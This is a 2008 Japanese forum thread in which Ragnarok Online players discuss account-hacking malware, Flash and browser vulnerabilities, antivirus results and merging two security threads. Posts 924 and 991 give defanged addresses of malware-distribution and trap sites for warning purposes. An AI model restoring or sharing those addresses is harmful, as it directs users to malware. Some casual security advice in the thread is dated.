886 名前:(○口○*)さん:08/06/06 07:07 ID:7/5jUEZZ0
>>882
脆弱性を突くコードが書いてあるならともかく
親frame送ってもしゃーないでしょ。

887 名前:(○口○*)さん:08/06/06 12:08 ID:9CD+rdne0
俺もクルセイダーwiki開いた後に検出されたけど感染してるオブジェクトをよく見てみたら
Janeで2ch見た時の画像のキャッシュだったwww
これは単に2chで踏んだものか・・(^o^)

888 名前:(○口○*)さん:08/06/06 17:26 ID:VwdBQTop0
基本的にJavascriptOFFならとんでもかからないよな?
JavaOFFでも踏んだら引っかかる垢ハクアドレスとか存在する?

889 名前:(○口○*)さん:08/06/06 17:32 ID:Fl1Dcarp0
するぜ

890 名前:(○口○*)さん:08/06/06 17:32 ID:oKkn+TL10
>>888
ちょっと上にあるFlash脆弱性の話とか。

891 名前:(○口○*)さん:08/06/06 17:42 ID:NXF0EwAr0
>>888
IEならActiveXも落とさな

892 名前:(○口○*)さん:08/06/06 18:29 ID:+v3JKs9U0
「〜〜しておけば踏んでも大丈夫」
なんてこと少ないからそう言う考えはやめた方が良い、随分前から言われてるけど

893 名前:(○口○*)さん:08/06/06 19:05 ID:PMsAP3hg0
FoxでNoScript+AdBlock導入済み。
ウィルス対策はカスペ。
確かに100%安全ってのはないと思うけど、今出回ってる垢ハックアドレスはどうなのかなあと。
Javaは初見サイトではOFFになってて、AdBlockでFlashも許可した物以外OFF。
なもんでこれで既存の垢ハクサイトは大丈夫かな?という疑問だったんだ。

894 名前:(○口○*)さん:08/06/06 19:07 ID:TWdWSPUT0
癌公認ネカフェでカスペオンラインスキャンしたら
Trojan-Spy.Win32.VB.mn
ってのが出たんだけど、C:\WINDOWS\system32\downloadmax.net.exeってファイル名で
これはROプレイしても大丈夫ですか?
ウィルスチェックだけで1.5hもかかった・・

895 名前:(○口○*)さん:08/06/06 19:10 ID:L0f71DDJ0
>>893
いやだからFlashplayerそのものに脆弱性があったから
サイトによって許可するしないは関係ないんだってば

896 名前:(○口○*)さん:08/06/06 19:51 ID:oKkn+TL10
>>893
とりあえずJavascriptとJavaは別物だから区別してほしい。
文脈でわかるけど紛らわしいよ。

それで「既知の手段に対して安全か」って話だよね?
さくらの一件は要するに「信頼しているサイトの経路を乗っ取る」
というものだから、許可したドメインにウィルスを仕込まれることになる。
だから全サイトでscriptもflashも止めるってわけじゃないなら
既存の手段の組み合わせだけでも穴は生まれる。

結局は>>892

897 名前:(○口○*)さん:08/06/06 19:54 ID:XBL80nue0
>>894
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FHACHILEM%2ER&VSect=Td
ttp://hjdb.higaitaisaku.com/database.cgi?cmd=dp&num=479
ROとは直接関係なさそうにも思えるが、個人的にはシステムドライブからその手の物が検出される≒セキュリティ対策がザルな店舗は
使いたくないな。
検出した画面のSSを撮っておいて、責任者出てこいを推奨。

>>895
FirefoxのNoScriptは、許可サイト以外ではコード自体のレンダリングを端折る=Flash自体がロードされないのだが。
無論、だからといってFlash Playerのバージョンを9.0.124未満で常用して構わない訳ではないが。

898 名前:(○口○*)さん:08/06/06 20:11 ID:TWdWSPUT0
>>897
詳細thx、ROとは関係なさそうだな。
感染活動行わないっていうからファイル削除してプレイするわ

899 名前:(○口○*)さん:08/06/06 20:52 ID:Fl1Dcarp0
>>898
再起動すると復活するぜwww

900 名前:(○口○*)さん:08/06/06 21:43 ID:AtowH7us0
今しがた、クルセwikiを見ようとして、転送確認にて不審なURLへの移動を回避したのですが、
トップページ(http://crsdr.netgamers.jp/)のみ閲覧した状態では大丈夫でしょうか・・・?

初歩的な質問で申し訳ありませんが、もしアウトでしたらご指摘お願いします。

901 名前:(○口○*)さん:08/06/06 21:51 ID:Fl1Dcarp0
TOPページヲ開いただけ OK
転送確認ページ OK
転送したがセキュリティソフトがブロックした 多分、セーフだが、全部ブロックで来たか不明なのでグレー
転送した(セキュリティソフトなしorすり抜け) NG

902 名前:(○口○*)さん:08/06/06 22:32 ID:lHoGydKF0
>>900
転送確認ページまでは大丈夫
その先をクリックしたならご愁傷様

903 名前:(○口○*)さん:08/06/06 22:48 ID:+v3JKs9U0
なんか似たような説明を毎回してる気がするな
以降Wiki転送に関してのテンプレは>>901でOKかな?

904 名前:(○口○*)さん:08/06/06 22:51 ID:YgoNu9vb0
転送っていう言葉は誤解をまねく。
外部リンク確認とかクッションページとかだし。

905 名前:(○口○*)さん:08/06/06 23:34 ID:7/5jUEZZ0
ウイルスびっくりテクノロジー
ttp://pc.nikkeibp.co.jp/article/trend/20080501/1001703/
タイトルはアレだけど、読み物として。

906 名前:(○口○*)さん:08/06/07 00:38 ID:QuaiTJNJ0
ところでアウトブレイクのせいでレス900超えたんだが、新スレと
ハクスレの統合、どうする?

個人的な意見では、統合前提でとりあえずLiveROにスレ建てして
その後RO板に行くなら是非スレ持ち込み、と考えるんだが。

もう一回アウトブレイクおきたら話す間もなく埋まるだろうし、本気で
考える時期じゃないかな?

907 名前:(○口○*)さん:08/06/07 00:44 ID:iD2rDPqj0
まぜこぜにしたら、それはそれで混乱起きないかなぁ。
ハクスレは危険URLの情報収集を主として、適切な名前に変える
なりして残していいと思う。

908 名前:(○口○*)さん:08/06/07 01:07 ID:iYqGef6i0
スレ1つでいいよ。個人意見としては。

変な誘導が湧くばかりだし、踏んだかもとか焦ってる人にも混乱の元に
なってるし、分かれてる価値がほとんど無い。ところで「ハクスレ」は
酷い略だと思う。

909 名前:(○口○*)さん:08/06/07 03:19 ID:CuF1Kj/n0
ハクスレ
に酷い意味でもあるの?

910 名前:(○口○*)さん:08/06/07 03:41 ID:KOJwqFZy0
単なる危険URL集積所を、MMOBBSのスレで行う意味は薄い支那。
慌ててドット抜きを忘れたまま張って削除依頼とか、ノイズが増える要素もある。
対処に必要なシステムは、殆ど外部で出来上がった感じもあるし。

911 名前:(○口○*)さん:08/06/07 06:37 ID:o3/OGzJX0
現状、誘導厨沸かなきゃ困って無いってのも現状だけどな。

当座は2つのままでいいんでない。次スレでゆっくりスレの行く末を検討しようや。

912 名前:(○口○*)さん:08/06/07 07:10 ID:O3XrClkE0
つまり誘導厨をアク禁依頼すればいいんですね、わかります

誘導厨が1人とすればの話だが

913 名前:(○口○*)さん:08/06/07 07:55 ID:xC0KHjJo0
何度か報告してるけど相手にもされないんだよね

914 名前:(○口○*)さん:08/06/07 08:00 ID:O3XrClkE0
誘導厨の行動が、一応はハクスレのテンプレに則ってるからかなぁ
ハクスレの次スレはテンプレから「重要な(ry」を削除して、それからアク禁依頼すべきか
そもそもテンプレから「重要な(ry」が消えれば誘導厨も消えるかな

915 名前:(○口○*)さん:08/06/07 08:41 ID:9V+Bs5C00
>>910に同意というかなんというか
向こうの1の
>アカウントハックに関する情報の集積・分析を目的とするスレです。
>被害や攻撃等のアカウントハックの具体的事例に関して扱います。
>重要な(以下略

アカウントハックに関する情報、具体的事例って
今のスレからすると危険アドレスそのものだけ、目的はそれの収集・報告だけだよね?
それってROセキュリティWikiに投稿フォームとか作って、それをWiki内で纏めてけばよくね?

まあWikiだから直接改竄される可能性もあるけど、もとから危険アドレス満載って考えもあるし
両方のスレのテンプレ案と検体提出先の3ページだけってのもさみしいし

916 名前:(○口○*)さん:08/06/08 13:54 ID:BA3lNYUP0
>906の案でいいんじゃない?
スレタイにアカウントハック(アカハック)の文字入れたら
混乱はしないだろうし。

新スレはこっちが先になるから、向こうの新スレの段階で
LiveROの新スレに誘導すればいい。

Ragnarok板にないと困るというなら、新スレで論議すれば
済むと思うな。

917 名前:(○口○*)さん:08/06/08 13:57 ID:oRrK6QSe0
あっちの方が見てる人工も多いし、
情報欲しい人はとりあえず向こうでハックで検索して、
そこで出るあっちに書き込まれやすいのは仕方ない気もする。

918 名前:(○口○*)さん:08/06/08 14:06 ID:ckP2k02J0
良く是非スレに持ち込むって言ってる人が居るけど、
あそこは「新スレを立てるときに是非を問うスレ」だよ?

統合とかは該当のスレの住人同士で話し合って決めることで管理人さんに是非を問うものじゃない

919 名前:(○口○*)さん:08/06/08 14:29 ID:fVQY59oY0
最近では料理スレか、RO板に新規スレ立ったのは
あの時は既存スレと統合の話も一部であったからなあ
今回はLiveRo板とRO板とで交代でもしない限り
是非スレの要素はないと思われる

とりあえずこうか
A)現行のまま、但し役割分担は強化
B)このスレのみ存続、垢ハックスレは廃止
 URL収集の後継としてセキュリwikiなどを活用
C)垢ハックスレの取り扱い内容を緩和
 アカウントハックネタに限り、セキュリティ対策・相談・雑談も受付
 (Aとは逆の方向)
D)垢ハックスレとこのスレとを交換
 このスレがRO板に移動、垢ハックスレはLiveRO板へ
 「ROに特化した話題」ではないが、プレーヤーとして必須の情報であり、
 何か起こった場合RO板をまず見ることが多いと思われるため

CとDは新規だが、こういう方向性もあるかなと

920 名前:(○口○*)さん:08/06/08 14:58 ID:FX5vuqbW0
>URL収集の後継としてセキュリwikiなどを活用
これwikiに書けってこと? なら面倒だからやらないかな。

921 名前:(○口○*)さん:08/06/08 15:25 ID:EWtradu40
>919
A)現実的に無理。
 それに狭義のアカハックに限ると結局BOTが沸く。

B)一番現実的。
 でもURL収集にWikiというのは反対。(後にまとめ情報を書くのなら可)
 危険アドレスの報告はスレ閲覧者に警告を発する意味もあるから、分離すると
 見なくなる人が殆どになると思う。(LiveRO板以上に見ない人が多数と予想)

C)一見ハクと無関係に見えて実はハクが関係してた、というケースもあり
 書き込み時点では判断つかない。(ゆず・さくらの件)
 一括でやるならセキュスレの性質で行かないと、A)と同じでBOTが沸く。

D)セキュスレが全般見る性質上、ハク報告に限定したハクスレをLiveRoに置いても
 使われずにdat落ちするだけじゃないか?

Wikiの活用方法は、今のまとめ臨時のサイトや利ネージュ資料室を参考に
各種対策等を書き込んでいければいいと思うが、運用方法は今後の議題。

まずはLiveRoで統合、それから必要ならRO板に移転、の流れ(つまりB案改や>906案)に
した方がいいと思う。

922 名前:(○口○*)さん:08/06/08 15:26 ID:5eExmpLX0
ハクスレ828
i115■swf 15/32 ttp://www.virustotal.com/jp/analisis/1a9e793f5dfa5870420a11adfa4f7f20

923 名前:(○口○*)さん:08/06/08 15:42 ID:FX5vuqbW0
ノートン…Adobeと共同調査したのに…

924 名前:(○口○*)さん:08/06/09 00:27 ID:Dz/FOxrN0
MixiのRO関係コミュに爆撃されてる、懐かしいアドの代物
www■geocities-jp■com/ragnarokonline/ca-pub-1828667301391598■zip
RARファイルの拡張子偽装で、中身は同名のEXE

VT 15/32 ttp://www.virustotal.com/analisis/3f8cae65c183c881785fc65476f470b0

Avast/BitDefender/マカフィー/ノートン/NOD32がスルー。
引っかかる人は居ないと思うけど、ご注意を。

>新スレ統合の件
個人的には、統合された時にRO板でもLiveRO板でも、どっちにあっても気にしないけど
こうやって見つけたものを報告するのに、Wiki池と言われるのは勘弁。

925 名前:(○口○*)さん:08/06/10 15:02 ID:GfziOW5x0
Windows XP SP3のレジストリ破損問題、シマンテックが対応ソフトをリリース
「Nortonの一部機能も原因」と責任の一部を認める
ttp://www.computerworld.jp/topics/vs/110989.html
約2週間前、Windows XP SP3にアップグレードしたSymantec製品のユーザーから、
「Windowsのデバイス・マネージャに何も表示されなくなった」「ネットワーク接続が削除された」
「レジストリに大量の不正エントリが追加された」といった問題が報告されたのを受け、
SymantecはSymRegFixの提供を約束していた。Symantecは当初、
これらの問題の原因はMicrosoftにあるとしていたが、後に責任の一部を認めた。

そもそもSymantecは、MicrosoftのFixccs.exeに問題の原因があるとの見方を示していた。
また、レジストリ変更を監視する同社製以外のセキュリティ・ソフトウェアも、
レジストリ破損の原因になりうるとも主張していた。だが、そうした事例は、
Microsoftのサポート・フォーラムに今のところほとんど報告されていない。

926 名前:(○口○*)さん:08/06/10 21:31 ID:GfziOW5x0
「QuickTime 7.5」公開、5件の脆弱性を修正
ttp://internet.watch.impress.co.jp/cda/news/2008/06/10/19878.html
ttp://www.apple.com/jp/quicktime/download/

927 名前:(○口○*)さん:08/06/11 01:13 ID:wtwZIUK+0
カスペオンラインスキャン使おうとしたら、以下の文が出て
出来なくなったんだけど、どうすればいい?心当たりが無い。

>製品 カスペルスキー オンラインスキャナ で現在使用されているキーは Kaspersky Labsによりブロックされました!

928 名前:(○口○*)さん:08/06/11 01:16 ID:zk77qCUT0
http://www.kaspersky.com/kos/jpj/partner/default/kavwebscan.html
※ カスペルスキーオンラインスキャナ PRO, ベータ版をインストールしている場合、予め"プログラムの追加と削除"からアンインストールしておく必要があります。
※ 「ライセンスの有効期限」が切れている旨のメッセージが表示される場合、カスペルスキーオンラインスキャナをアンインストール後、再度アクセスください。

929 名前:(○口○*)さん:08/06/11 01:44 ID:wtwZIUK+0
>>928
一旦、オンラインスキャナアンインスコしたけどダメだった
数週間前までは普通にできたのになぜ・・

930 名前:(○口○*)さん:08/06/11 03:49 ID:kAdUwrwWO
携帯から失礼します

アカハクにやられまして

すぐ癌に通報して別PCからアトラクションパスと癌パス変更、商人にアイテム集められてたのでとりあえず商人だけキャラパス変更しました

今ノートンでオンラインスキャンかけてるところなんですが他にやるべき事はありますか?

931 名前:(○口○*)さん:08/06/11 03:53 ID:Uum6y+O10
>>929
同じく今試してみたけど同エラー、数日前までは普通に出来てた
PCにインストールされてるアンチウイルスソフトはNOD32

932 名前:(○口○*)さん:08/06/11 04:15 ID:kZRfeYha0
ほんとだ
アンインスコしてもだめだな
XPSP2 NIS2008

933 名前:(○口○*)さん:08/06/11 04:28 ID:kZRfeYha0
追記

本家サイトのフリースキャンはいけた。だいぶスキャン画面綺麗になってるな、関係あるかもしれない
ttp://www.kaspersky.com/virusscanner

934 名前:(○口○*)さん:08/06/11 05:46 ID:yjP0bwaX0
同じくだめだったXPSP3 KIS7.0

あとエラー出たあとに再起動してらKIS7.0の定義ファイル自体が壊れた
もう1回同じ手順やっても再現しなかったからそれが原因とも限らないし
KIS入れてるのにカスペのオンラインスキャナかける人もあまりいないと思うが
一応報告しとく

935 名前:(○口○*)さん:08/06/11 05:51 ID:/NG1YFF60
>>930
とりあえずPCのクリーンインストールをオススメしておく

936 名前:(○口○*)さん:08/06/11 07:24 ID:RJttd7m80
WindowsUpdate来てるぞー

937 名前:(○口○*)さん:08/06/11 07:34 ID:AAskYY/30
またこりゃ一杯きたな

938 名前:まとめ臨時 ◆kJfhJwdLoM:08/06/11 07:53 ID:megR7Rr+0
最近、リストに抜けがないか心配だったりします。

元々人様のリストから取ってきて目視手動でやりくりしているので
最近インジェクションの荒波以降は確認する作業で
少々日常に泣きが入ってきている状況だったりします。
罠を自動取得更新するような物があるといいのですけど
単体PCで常時点けっぱなしとか出来ない環境なのでそういうわけにも行かず。

なので、もしリストに抜けあった場合は
このスレやら拍手返事ボタンに突っ込みをしていただけると助かります。

939 名前:(○口○*)さん:08/06/11 08:21 ID:5yZ5KywV0
緊急(3) 重要(3) 警告(1)
ttp://www.microsoft.com/japan/technet/security/bulletin/ms08-jun.mspx

先月分が、OSでは無くOfficeアプリなどに偏っていた反動か、今回はWindows本体絡みが多いか。

940 名前:930:08/06/11 08:30 ID:kAdUwrwWO
>>935
やはりそれが1番ですか、ありがとうございます

携帯から失礼しました

941 名前:(○口○*)さん:08/06/11 15:43 ID:RWNn7s/t0
先ほどantivirでスキャンしたら

TR/Drop.Agent.sit というファイルが2つ検出された、ここ数日RO関係のサイトくらいしか
いってないから感染したのはそれ系だと思うんだけど
どんなウィルスか調べるにも情報がないのですが・・・どなたかわかりませんか?

942 名前:(○口○*)さん:08/06/11 15:49 ID:OC+FhZOa0
これの亜種なら、マルウェアをローカルに生成するTrojanのようだが。
http://www.avira.de/jp/threats/section/fulldetails/id_vir/4184/tr_drop.agent.95744.html

943 名前:(○口○*)さん:08/06/11 16:06 ID:RJttd7m80
>>941
そのファイルをVirusTotalあたりに投げて
各社の検出名でググればいいんじゃね?

944 名前:(○口○*)さん:08/06/11 16:13 ID:NbX4jRLsO
やはりカスペオンラインスキャン出来ない仲間がいて少し安心した

このスレ見る前だったからいきなり昨日出来たオンラインスキャンが
今日から出来なくなりファビョってカスペに電話したら
分かりません的な回答されて悩んでたよ

945 名前:(○口○*)さん:08/06/11 16:28 ID:RJttd7m80
>>944
メンテ中なのか攻撃受けてるのか知らんけどcom側に繋がらんね
(オンラインスキャナはco.jpもruもcomに飛ぶ)。
ruのファイルスキャナは使える。

946 名前:(○口○*)さん:08/06/11 16:59 ID:wtwZIUK+0
927だけど別PCでも無理だったわ。カスペ側の問題みたいね

947 名前:(○口○*)さん:08/06/12 05:03 ID:mGiKkQ0q0
俺も同じ状況だ。

948 名前:(○口○*)さん:08/06/12 05:42 ID:5PIXLTBI0
2008年の国別ドメイン危険度ランキング、香港「.hk」と中国「.cn」が急上昇

ttp://www.computerworld.jp/topics/vs/110809.html

中華ががんばっているようです

949 名前:(○口○*)さん:08/06/12 07:03 ID:apWT7wqn0
>>859

950 名前:(○口○*)さん:08/06/12 18:50 ID:apWT7wqn0
Opera9.5
ttp://jp.opera.com/

951 名前:(○口○*)さん:08/06/12 19:09 ID:YHL2geRjO
今回の広告に埋め込まれるパターン増えたら、もう対策厳しいだろうなぁ
怪しいURLをクリックしないっていう前提を無視だもんな

952 名前:(○口○*)さん:08/06/12 19:13 ID:tMkCjLRV0
ダウンローダをブロックできなくても(フラッシュプレイヤーを最新にしてれば阻止できる筈だが)
本体をセキュリティソフトでブロックできれば無事だよ。

953 名前:(○口○*)さん:08/06/12 19:17 ID:LrcwmID50
今は、ね
新しい手口でそれされたら、わからないうちは危険大って事だし

954 名前:(○口○*)さん:08/06/12 19:24 ID:N3IFmlOs0
Webブラウズ時の脅威がほとんどだから、面倒でも別の独立した環境を
使う方が安全。あとは仮想化だとかねぇ。

955 名前:(○口○*)さん:08/06/12 19:47 ID:EIzRCrBn0
Flashの誤報のニュースの時に更新した人も多いだろうし、結果的に
タイミングがよかったとしか。

しかしxreaの件が0Dayだったと考えると、対策としては
・(犯人が中華と仮定して)PG2で国別でブロック
・(通信先が既知のドメインと仮定して)hosts変更

抜本的な対策としては
・捨て環境(仮想PCや非Win環境)を用意して常に運用しかない
だろうなぁ。。。
VMWare+Ubuntuとか、タダで簡単に用意できる時代になったとは
いえ、まだまだ一般的とは言えないし。

956 名前:(○口○*)さん:08/06/12 19:53 ID:EIzRCrBn0
ところで950超えたが、次スレどうする?
まだ決まってないようだが。

1)次スレは統合スレとしてLiveRo、ハクスレが埋まったら吸収
  RO板への移住の話は新スレで決める
2)セキュスレの次スレはなしで埋まったらハクスレに移動
  今後はハクスレ埋まれば新スレは統合スレ

現実的には、このどちらかになると思うんだが。

957 名前:(○口○*)さん:08/06/12 20:47 ID:Q/G7TL3n0
向こうに合流でいいんじゃないかな。当時の分割理由の意義が多少薄れている事もある現状、
その辺のあり方で無駄にスレを消費するよりは好ましいかと。
こちらよりはあちらなのは、まとめさんや幾らかのWikiでここのログが保管されているとはいえ、
やはりログが消えないあちらは魅力だと思う。

しかし今回の騒ぎで雷鳥Wikiさんとかが無料から有料に移行したりしてる。色々と心苦しいご時世だあねぇ。

958 名前:(○口○*)さん:08/06/12 21:58 ID:tMkCjLRV0
一般のセキュリティ系雑談も扱う訳だし、現状のテンプレのRO板には合流できないよ。
きちんと結論が出るまでは現状維持するしかないでしょ。

LiveROに次のセキュスレ立てて、そこで使い分けとテンプレの相談すればいいよ。

959 名前:(○口○*)さん:08/06/12 22:16 ID:apWT7wqn0
同じことを数スレ前から繰り返している気がする

960 名前:(○口○*)さん:08/06/12 22:18 ID:0gnmUtl/0
そろそろ変えないと向こうのグダグダを繰り返すだけになるな

961 名前:(○口○*)さん:08/06/12 22:21 ID:2gWnWTkI0
LiveRO側に統合(一括して扱う)って意見が多数、
というか明確な反論がなかった気がする。

962 名前:(○口○*)さん:08/06/12 23:00 ID:IvvF0UH/0
>>921
>まずはLiveRoで統合、それから必要ならRO板に移転、の流れ
>(つまり>>919B案改や>906案)にした方がいいと思う。
で決定でしょ?
垢ハクスレの次スレはなし、このスレに統一した上で
ここの次スレで改めて身の振り方を考える、と
向こうも900近いし、早晩統一できると思う

963 名前:(○口○*)さん:08/06/13 01:41 ID:jDXmHTmS0
スレイプニルでセキュアモード(ActiveX、Java、JavaScript、音楽、ビデオ再生を不許可)
にした場合は、FLASH無効と似たような効果があると見ていいんでしょうか?

964 名前:(○口○*)さん:08/06/13 04:06 ID:t2wIIccJ0
YouTubeのてきとーな動画踏めばわかるんじゃね?

965 名前:(○口○*)さん:08/06/13 09:22 ID:pO3VN8Ed0
一応住み分けしている(ログが流れないように分けてある)んだから、
現状維持で、方針の修正をすればいいよ。

966 名前:(○口○*)さん:08/06/13 09:46 ID:DJIk+dxG0
住み分けすら出来てないだろ
話題的にセキュスレが包括するのは当然にせよ、結局は両方でネタ分散

で、ガチガチに固めるとコピペ厨が次スレでも暴れまくるのが目に見えてる

まずはLiveRoで統合、RO板に移るかは新スレで相談、でいい

967 名前:(○口○*)さん:08/06/13 10:49 ID:dkEK4u4O0
だなぁ

968 名前:(○口○*)さん:08/06/13 11:11 ID:AWytohlw0
分散してるとコピペ厨じゃなくとも、何だかんだで誘導レス出てノイズ増える。
回答する時もわざわざ移動したりで、二度手間になるだけだし。

ところで今ちょっとセキュWiki見てテンプレ見直してるんだが、スレタイどうする?
・アカウントハック対策
・セキュリティ
この2言は入れた方がいいと思うんだが、こんな感じかね?

アカウントハック対策セキュリティ総合スレ

スレタイ文字数とレス行数、連続レス投稿数はどこで見るんだっけ?
これらが長いとスレ立て時が大変だし。

969 名前:(○口○*)さん:08/06/13 11:13 ID:vb0hEhQR0
アカウントハック・セキュリティ総合対策スレ

って感じのがいいかもしれない。

970 名前:(○口○*)さん:08/06/13 11:59 ID:6b950/qt0
アカウントハック対策はセキュリティに含まれるような気が
セキュリティ対策スレとかセキュリティ向上スレとかでも分かるでしょ

971 名前:(○口○*)さん:08/06/13 13:03 ID:m+Jjrvck0
>969でいいんじゃない?

スレは駆け込み寺の性格があるから、アカウントハックの文字は
入れておいた方がいいだろうし。
セキュリティの文字は、全般も扱うという意味を示すし。

972 名前:(○口○*)さん:08/06/13 13:07 ID:vFRFv9O90
”総合”って必要?
アカウントハック・セキュリティ対策スレでいいと思う。

973 名前:(○口○*)さん:08/06/13 13:31 ID:jJMZ8YEr0
「ハッカー攻撃の技術ない」米議員の被害指摘に中国
http://sankei.jp.msn.com/world/china/080613/chn0806130037001-n1.htm

974 名前:(○口○*)さん:08/06/13 13:32 ID:7StziKe/0
もういっそ「対策」も「スレ」も省いてしまうとか。
でもエラースレなんかではたまに2chと間違えて来る人が居るから

ROアカウントハック・セキュリティ

975 名前:(○口○*)さん:08/06/13 13:41 ID:dkEK4u4O0
アカウントハックと書くなら、その続きに対策の文字は欲しいが。。。

976 名前:(○口○*)さん:08/06/13 16:22 ID:6b950/qt0
ROアカウントハック対策・セキュリティ

セキュリティ・ROアカウントハック対策
あたり?
スレの文字は欲しいなあ、気にしなくてもいい範囲なんだが、ないとなんかネタっぽくて…

んでそろそろテンプレ案貼ってホシス

977 名前:(○口○*)さん:08/06/13 17:02 ID:7StziKe/0
>>976
ごめん遊びすぎた、>>974は半分冗談だからあんまり気にしないでw
本気なのは「RO」ってつけたほうがいいところと、
「対策」つけるなら>>976のように「アカウントハック」にちゃんと
くっつけるか、さもなければいらないってこと。

「対策」を必要とするのは「アカウントハックを冗長させるスレではない」
という主張なんだろうから、たとえば>>972案は
「アカウントハックするためにセキュリティ突破の策を考えるスレ」と
ひねくれた解釈ができてしまう。それじゃ片手落ちなんだ。

978 名前:(○口○*)さん:08/06/13 18:33 ID:nVaLOcak0
アカウントハック 対策・質問・雑談スレ でどうかな。長過ぎるけど。

分離しっぱなしでもいいと思うんだけどなぁ。両方巡回するのは手間じゃないし、アカハックの話題が進行中に
セキュリティ関係のニュース貼るのは憚られるから、セキュスレのような自由度の高いスレは、駆け込み寺とは
別にあってもいいと思うんだ。

979 名前:(○口○*)さん:08/06/13 19:07 ID:1JVxsPFE0
統合して無理がありそうならまた分離すりゃいいんじゃないかね。
結局は>>966-968だし。
しっかりアンカーつけてレスしてりゃふたつみっつ同時に話が進行してても別に問題ない。

980 名前:(○口○*)さん:08/06/13 20:17 ID:MkHxL8dq0
テンプレ案、セキュWikiで考えてるけど、どうにも削りにくい

書きかけのテンプレ案
ttp://rosafe.rowiki.jp/index.php?%A5%A2%A5%AB%A5%A6%A5%F3%A5%C8%A5%CF%A5%C3%A5%AF%C2%D0%BA%F6%A1%A6%A5%BB%A5%AD%A5%E5%A5%EA%A5%C6%A5%A3%BB%A8%C3%CC%A5%B9%A5%EC%A5%C6%A5%F3%A5%D7%A5%EC%B0%C6

LiveRoの設定が http://enif.mmobbs.com/livero/SETTING.TXT こうなってるので
4レス以内にしたいんだが、レス4,5が削りにくい。

981 名前:(○口○*)さん:08/06/13 21:10 ID:nVaLOcak0
>>980
スレ立ての人がテンプレ貼りおわるまで自粛したり、テストスレを利用して再投稿可能になる時間を縮める支援するとか。

982 名前:(○口○*)さん:08/06/13 21:24 ID:t2wIIccJ0
セキュリティホールmemoやリネージュ資料室で
xreaのウイルス広告について出ているので、常連さんは一読を。

983 名前:(○口○*)さん:08/06/13 21:40 ID:exk73nNb0
どっちかっていうと、何も知らない人に読んでもらいたいんだけれどね。。。

984 名前:(○口○*)さん:08/06/13 21:56 ID:t2wIIccJ0
まーそうなんだけど、物質スレとかあちこちに貼ったりするのもなんかなーと。

985 名前:(○口○*)さん:08/06/13 21:57 ID:f9h2Tssa0
新スレテンプレ、>980のでいいんじゃね?

不備あれば後々追加すればいい。
スレの過去ログ部分をどうするか、って問題はあるが、Wikiに添付すれば
済むだろうし、駄目ならまとめ臨時氏の方に誘導張るって手もあるだろうし。

スレタイは案にあるように アカウントハック対策・セキュリティ総合スレ で
いいのかな?
スレbヘ1から?とコメントされてるが。

問題無いならそろそろ建てた方がいいかも。。

986 名前:(○口○*)さん:08/06/13 22:05 ID:R8rXd+Au0
アカウントハック対策もセキュリティ関係の一部分にすぎないのじゃないかね
ROセキュリティ対策総合スレ、でいいんじゃないの

987 名前:(○口○*)さん:08/06/13 22:08 ID:Tm5cXD9m0
ハックでスレタイ検索してヒットしないのはまずくね?

988 名前:(○口○*)さん:08/06/13 22:23 ID:hCVMN6tV0
スレタイにこだわる必要もないだろうし、>980案で建ててきた

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

5スレ使っても建てれたので、長さ的にも問題なかった

989 名前:(○口○*)さん:08/06/13 22:25 ID:nVaLOcak0
乙っす

990 名前:(○口○*)さん:08/06/13 22:44 ID:MkHxL8dq0
>988、乙でした。
あとテンプレ整理手伝ってくれた人もありがとうでした。

991 名前:(○口○*)さん:08/06/14 23:08 ID:L2SGiJna0
埋めがてら

hostsに記載してる各ホスト名からIPを引いて、PG2用のリストを
作ろうとスクリプトを書いて実行したら、nslookupに1時間前後
かかった罠。

さらに、ものの試しにそれを逆引きしてみたら

gg■haoliuliang■com (まとめ臨時氏のサイトに掲載アド)

222■3■4■11

ZH004011■ppp■dion■ne■jp

うーん……

992 名前:(○口○*)さん:08/06/14 23:31 ID:F89IxDKT0
つまり、ionユーザーがDDNSサービス使って罠サイトを作ってた、と
考えられる……のか?

それ国内IPだし、PG2使いでも抜けられる可能性が高いような。
DDNSだとIPコロコロ変わる可能性あるし、厄介だな……

993 名前:(○口○*)さん:08/06/14 23:32 ID:F89IxDKT0
ionじゃない、dionだ

994 名前:(○口○*)さん:08/06/14 23:33 ID:j+s8LP8L0
何を言ってるのかさっぱりだぜ!

995 名前:(○口○*)さん:08/06/14 23:38 ID:dw/ninam0
発信元が国内ってもゾンビPCかもしれないが、ODNの件もあるし。。。

996 名前:(○口○*)さん:08/06/14 23:49 ID:F89IxDKT0
odnのはまだ罠アドレスを書きまくるだけだが、こっちは罠サイトの
実体がdionにあった、って事だろ?
odnの奴よりタチ悪いというか、PG2のみのブロックだと確実に
踏む気がする。

>994
罠アドレスとして報告されてるものが、実はdionのIPだった、という事。
罠設置を考えるとゾンビPCの可能性より、国内の協力者という線が
強い気がする。

997 名前:(○口○*)さん:08/06/14 23:59 ID:uDzp6GAb0
ODNは、いま契約すれば○ヶ月無料!みたいなのを次々と乗り継いでる
とかなんだろーか?で、クライアントとして各方面投稿はできるけど
サーバにはなれない。

つか、国内なら普通に警察を動かせるんじゃないの。

998 名前:(○口○*)さん:08/06/15 00:21 ID:IxYS6xjI0
無料のDDNSサービス使えば、鯖として運用可能だからなあ
次々乗り継いだとしても、自分のIP送れば設定完了だし

odnのアレも自ドメイン取って運用とかしてくるのかねぇ?

999 名前:(○口○*)さん:08/06/15 00:22 ID:IxYS6xjI0
さて、埋まるし次スレ誘導

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

1000 名前:(○口○*)さん:08/06/15 00:25 ID:IMkV7jgw0
ok、移動しようか。

アカウントハック対策・セキュリティ 総合スレ
http://enif.mmobbs.com/test/read.cgi/livero/1213363112/

1001 名前:1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


全部 最新50
DAT2HTML 0.35d Converted.